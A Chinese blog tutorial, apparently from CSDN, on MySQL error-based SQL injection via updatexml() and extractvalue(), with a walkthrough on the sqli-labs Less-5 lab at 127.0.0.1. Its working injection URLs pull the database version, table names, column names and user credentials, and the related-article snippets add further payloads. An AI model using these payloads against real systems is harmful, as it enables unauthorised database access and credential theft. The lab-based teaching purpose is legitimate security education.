08、注入篇--报错注入

最新推荐文章于 2023-07-22 10:46:40 发布
最新推荐文章于 2023-07-22 10:46:40 发布
阅读量446 收藏 1
点赞数
分类专栏: WEB安全 文章标签: 报错注入 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/115441885
版权

利用场景

当页面没有正确的返回错误信息时,就可以利用报错注入

原理

​ 利用数据库中的个别函数进行报错使用

常见函数

  • updatexml()
  • extractvalue()

extractvalue()

extractvalue() :对XML文档进行查询的函数

语法:extractvalue(目标xml文档,xml路径)

第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。

extractvalue(456,concat(0x7e,version(),0x7e))

updatexml()

updatexml():更新XML文档的函数

语法:updatexml(目标xml内容,xml文档路径,更新的内容)

updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

实际上这里是去更新了XML文档,但是我们在XML文档路径的位置里面写入了子查询,我们输入特殊字符,然后就因为不符合输入规则然后报错了,但是报错的时候他其实已经执行了那个子查询代码

其他所用函数

  • concat() ==>将多个字符串连接成一个字符串

靶场

1、进入靶场
在这里插入图片描述
2、使用反斜杠\进行探测,报出错误信息
在这里插入图片描述

3、分析报错

''1\' LIMIT 0,1' ==>'1\' LIMIT 0,1  ==>猜测变量由单引号包裹
故构造payload  1' -- q

4、写入payload,页面正常
在这里插入图片描述

5、得到字段数3,观察到页面没有回显点,但是有报错信息
在这里插入图片描述
在这里插入图片描述

6、可利用updatexml()函数

构造payload:updatexml(1,concat(0x7e,version(),0x7e),1)
注意MySQL支持16进制编码

http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,version(),0x7e),1)-- q
得出版本号 5.0以上

在这里插入图片描述

7、利用MySQL自带数据库information_schema

http://127.0.0.1/sqli/Less-5/?id=1' and
 updatexml(1,concat(0x7e,(select table_name from information_schema.tables where 
 table_schema=database() limit 0,1),0x7e),1) -- q

在这里插入图片描述
在这里插入图片描述
8、查看users表中的字段名

http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,
concat(0x7e,(select column_name from information_schema.columns where
 table_schema=database() and table_name='users' limit 0,1),0x7e),1) -- q

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得出users表中有三个字段名:id、username、password

9、分别得出username和password 字段数据
第一个username字段数据Dumb
在这里插入图片描述
第一个password字段数据:Dumb
在这里插入图片描述

小白学安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入——extractValue()报错注入
heyingcheng的博客
03-06 2208
在实际的注入过程中,查询的列(比如本例中的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这就是报错注入。这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123。同理,从第31个字符开始显示,显示后面的30个字符。比如在本例中把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错。
sql报错注入:extractvalue、updatexml报错原理
weixin_30642267的博客
03-07 732
报错注入:extractvalue、updatexml报错原理 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的两个函数:extractvalue、updatexml 名称 描述 ExtractValue() 使用XPath表示法从XML字符串中提取值 UpdateXML() 返回替换的XML片段 通过这两个函数可以完成报错注入 一、extractvalue函...
SQL 注入漏洞(七)报错注入
不秃头的程序Yang
06-12 1009
一、代码分析 二、报错注入攻击 1、获取库名
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1004
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
sql注入-报错注入1】extractvalue()函数 报错注入
07-10 3070
报错注入】extractvalue()函数的使用
SQL手工注入完全
09-08
SQL手工注入完全
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
SQL注入漏洞全接触——高级.txt
02-13
看完入门和进阶后,稍加练习,破解...5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
解决angularjs service中依赖注入$scope报错的问题
10-17
今天小编就为大家分享一解决angularjs service中依赖注入$scope报错的问题,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Too Naughty网址导航主题-PHP
06-20
360,必应搜索平台)用户可自行申请收录,由管理员后台审核文章管理发布功能每文章均有评论功能首页引用热门和推荐榜单每日一文阅读用户积分制用户便签系统前台简介:1.采用PHP+MYSQLS架构,安全稳定,防注入功能...
SQLilabs的第19关——http请求头注入(Referer)(报错注入
最新发布
qq_73393033的博客
07-22 304
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
报错注入原理分析以及python写报错注入
m0_46304840的博客
03-08 901
前言: 什么是报错注入报错注入就是页面上会回显出错的地方 就比如下面这个图一样,这就是报错注入 一般使用在没有回显的地方,语句会报错的地方,一般情况下盲注也可以用。但是 能不使用盲注的情况下,就不使用。因为那样是真的累~~~ 正文: 0x01:源码分析 <?php $con = mysqli_connect("127.0.0.1","root","root","test...
sql盲注_extractvalue报错注入
sugar_by的博客
06-02 953
什么是报错注入 这是一种页面响应形式,响应过程如下: 用户1在前台页面输入检索内容------>后台将前台页面上输入的检索内容无加区别的拼成sql语句,送到数据库执行------->数据库将执行的结果无加区别的显示到前台页面上 俩个“无加区别”后台对输入输出的合理性没有做检查 也就是说输入进去的内容和输出的内容不做检查的 那什么时候用报错注入呢? 构造语句,让错误信息中夹杂可以显示数据库内容的查询语句 返回报错提示中包含数据库中的内容 命令对但是不回显 但是报错是......
mysql extractvalue_Sqli-labs Less-17 使用extractvalue()函数进行报错注入
weixin_34378978的博客
02-01 790
本关我们可以看到是一个修改密码的过程,利用的是update语句,与在用select时是一样的,我们仅需要将原先的闭合,构造自己的payload。尝试报错Username:adminPassword:1'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versio...
报错注入的学习笔记
a1185375204的专栏
10-19 1065
报错注入的原理和实例笔记
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 &lt;div&gt;&lt;p&gt;&lt;a&gt;标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
extractvalue报错注入
bangyan3903的博客
08-18 3480
查看源码 $uagent = $_SERVER['HTTP_USER_AGENT']; ………… $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ………… $sql="SELECT users.username, users.password FROM users...
sql注入报错注入
weixin_47075747的博客
02-28 5403
报错注入 常用的报错注入就两种:extractvalue , updatexml 什么时候使用报错注入呢? 当没有一个合适的数据返回点的时候就需要报错注入注入的时候后端是被注入了的,但是前端没有得到更好的显示。 extractvalue payload: and extractvalue(null,concat(0x7e,(payload),0x7e)) 对数据库进行 xml 文档的故意报错 利用 concat 在后台进行拼接 指定第一个参数为 null ,让他故意报错,讲第二个参数种的语句带入
sql基于 extractvalue(),floor(),updatexml()函数的报错注入
2ed
03-27 1912
floor函数报错 select 1 from (select count(*),(concat(floor(rand(0)*2))x from information_schema.tables group by x)a; 暴库 select 1 from ( select count(*),(concat((select schema_name from information_sche...
eazy-sql报错注入
06-03
你好,很抱歉听到你的代码出现了注入问题。通常情况下,避免 SQL 注入的方法是使用参数化查询。具体来说,使用参数化查询可以将用户输入的数据与 SQL 查询语句分开,从而避免恶意用户在输入时注入恶意 SQL 代码。 如果你使用的是 eazy-sql,可以在查询时使用 "?" 占位符来代替用户输入的数据,然后在执行查询时将占位符替换为具体的值即可。例如: ``` const username = req.body.username; const password = req.body.password; const sql = "SELECT * FROM users WHERE username = ? AND password = ?"; const result = await db.query(sql, [username, password]); ``` 这样可以有效避免 SQL 注入攻击。同时,在接收用户输入时,也应该进行必要的过滤和验证,确保输入的数据符合预期的格式和范围。 希望这些信息能帮到你解决问题。如果你还有其他问题或需要进一步的帮助,请随时问我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值